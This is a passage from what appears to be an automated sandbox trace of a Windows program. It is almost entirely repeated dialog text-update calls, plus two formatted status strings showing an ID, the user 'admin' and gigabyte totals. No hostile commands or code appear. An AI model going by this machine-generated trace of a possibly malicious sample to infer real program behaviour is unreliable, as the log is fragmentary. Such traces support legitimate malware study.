(hWnd=0x80162, lpString="") returned 1 [0073.237] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0073.237] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0073.466] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0073.466] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0073.657] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0073.657] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0073.702] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0073.702] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0073.769] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0073.769] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0073.830] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0073.830] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0074.028] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0074.046] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0074.095] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0074.095] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0074.102] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0074.103] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0074.158] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0074.158] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0074.220] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0074.253] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0074.290] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0074.290] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0074.728] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0074.728] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0074.733] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0074.733] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0074.807] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0074.807] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0075.116] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0075.116] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0076.622] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0076.622] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0076.796] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0076.804] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0077.008] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0077.008] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0077.079] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0077.080] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0077.544] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0077.544] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0077.614] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0077.614] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0077.649] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0077.649] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0079.294] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0079.294] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0079.350] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0079.350] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0079.412] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0079.412] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0079.474] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0079.474] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0079.537] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0079.537] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0079.599] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0079.599] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0079.662] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0079.662] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0079.725] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0079.725] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0079.798] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0079.798] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0080.226] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0080.226] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0080.255] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0080.255] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0080.317] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0080.317] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0080.379] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0080.379] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0080.441] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0080.441] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0081.955] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0081.955] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0081.955] wsprintfW (in: param_1=0x18f3f0, param_2="1. ID: %08X\r\n2. %s\r\n" | out: param_1="1. ID: 4B2E4630\r\n2. admin\r\n") returned 27 [0081.955] wsprintfW (in: param_1=0x18f3f0, param_2="3. Total: %I64d.%02I64d gb (%u)/%I64d.%02I64d gb (%u)/%u%%\r\n" | out: param_1="3. Total: 0.00 gb (0)/0.00 gb (0)/0%\r\n") returned 38 [0081.955] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1005) returned 0x4015e [0081.955] SetWindowTextW (hWnd=0x4015e, lpString="1. ID: 4B2E4630\r\n2. admin\r\n--------------------\r\n3. Total: 0.00 gb (0)/0.00 gb (0)/0%\r\n") returned 1 [0082.006] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0082.006] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0082.414] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0082.415] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0082.470] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0082.470] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0083.891] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0083.891] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0083.984] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0083.984] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0084.054] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0084.054] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0084.099] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0084.099] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0084.506] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0084.506] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0084.560] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0084.560] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0084.646] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0084.646] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0085.766] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0085.767] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0086.071] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0086.071] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0086.073] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0086.073] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0086.136] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0086.136] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0086.578] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0086.578] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0086.581] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0086.581] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0086.604] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0086.604] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0086.666] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0086.666] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0086.729] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0086.729] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0086.822] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0086.822] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0086.868] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0086.868] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0086.957] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0086.957] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0086.993] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0086.993] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0087.072] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0087.072] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0087.131] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0087.131] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0087.196] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0087.196] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0087.269] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0087.269] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0087.337] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0087.337] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0087.383] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0087.383] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0087.464] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0087.464] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0087.520] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0087.520] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0087.570] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0087.570] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0087.661] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0087.661] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0087.711] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0087.711] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0087.758] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0087.758] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0087.845] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0087.845] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0087.885] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0087.885] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0087.930] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0087.930] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0087.992] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0087.992] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0088.055] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0088.055] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0088.134] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0088.134] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0088.210] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0088.210] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0088.292] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0088.292] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0088.329] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0088.329] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0088.382] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0088.382] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0088.852] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0088.852] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0088.906] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0088.906] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0088.959] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0088.959] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0089.021] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0089.021] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0089.084] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0089.084] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0089.146] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0089.146] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0089.208] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0089.209] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0089.272] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0089.272] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0089.333] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0089.333] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0089.396] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0089.396] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0089.505] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0089.505] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0089.525] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0089.525] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0089.585] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0089.585] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0089.676] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0089.676] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0089.723] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0089.723] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0089.778] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0089.778] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0089.851] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0089.851] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0089.926] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0089.926] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0089.973] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0089.973] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0090.051] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0090.051] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0090.098] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0090.098] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0090.183] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0090.183] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0090.238] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0090.238] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0090.312] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0090.312] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0090.378] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0090.378] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0090.425] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0090.425] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0090.473] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0090.473] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0090.535] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0090.535] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0090.601] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0090.601] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0090.660] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0090.660] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0090.722] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0090.722] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0090.799] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0090.800] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0090.884] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0090.884] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0090.911] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0090.911] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0091.331] wsprintfW (in: param_1=0x18f3f0, param_2="1. ID: %08X\r\n2. %s\r\n" | out: param_1="1. ID: 4B2E4630\r\n2. admin\r\n") returned 27 [0091.332] wsprintfW (in: param_1=0x18f3f0, param_2="3. Total: %I64d.%02I64d gb (%u)/%I64d.%02I64d gb (%u)/%u%%\r\n" | out: param_1="3. Total: 0.00 gb (0)/0.00 gb (0)/0%\r\n") returned 38 [0091.333] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1005) returned 0x4015e [0091.333] SetWindowTextW (hWnd=0x4015e, lpString="1. ID: 4B2E4630\r\n2. admin\r\n--------------------\r\n3. Total: 0.00 gb (0)/0.00 gb (0)/0%\r\n") returned 1 [0091.353] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0091.353] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0091.395] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0091.395] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0091.455] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0091.455] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0091.550] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0091.550] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0091.595] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0091.595] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0091.689] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0091.689] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0091.736] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0091.736] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0091.783] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0091.783] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0091.875] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0091.875] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0091.938] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0091.938] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0091.986] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0091.986] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0092.028] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0092.028] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0092.111] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0092.111] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0092.188] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0092.188] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0092.225] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0092.225] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0092.329] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0092.329] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0092.375] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0092.375] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0092.423] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0092.423] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0092.516] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0092.516] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0092.562] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0092.562] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0092.594] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0092.594] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0092.657] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0092.657] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0092.719] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0092.719] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0092.781] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0092.781] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0092.844] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0092.844] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0092.937] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0092.937] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0092.976] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0092.985] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0093.375] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0093.375] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0093.421] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0093.421] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0093.483] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0093.483] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0093.545] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0093.545] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0093.629] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0093.629] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0093.686] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0093.686] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0093.757] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0093.757] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0093.824] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0093.824] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0093.900] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0093.900] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0093.951] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0093.951] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0093.998] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0093.998] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0094.092] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0094.092] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0094.138] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0094.138] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0094.184] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0094.184] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0094.251] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0094.251] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0094.312] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0094.312] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0094.384] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0094.384] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0094.450] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0094.450] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0094.484] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0094.484] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0094.544] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0094.544] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0094.607] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0094.607] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0094.669] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0094.669] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0094.731] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0094.731] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0094.825] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0094.825] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0094.862] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0094.862] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0094.918] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0094.918] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0095.000] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0095.000] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0095.043] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0095.043] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0095.266] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0095.266] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0095.467] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0095.467] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0095.493] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0095.493] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0095.542] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0095.542] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0095.608] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0095.608] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0095.676] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0095.676] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0095.854] GetDlgItem 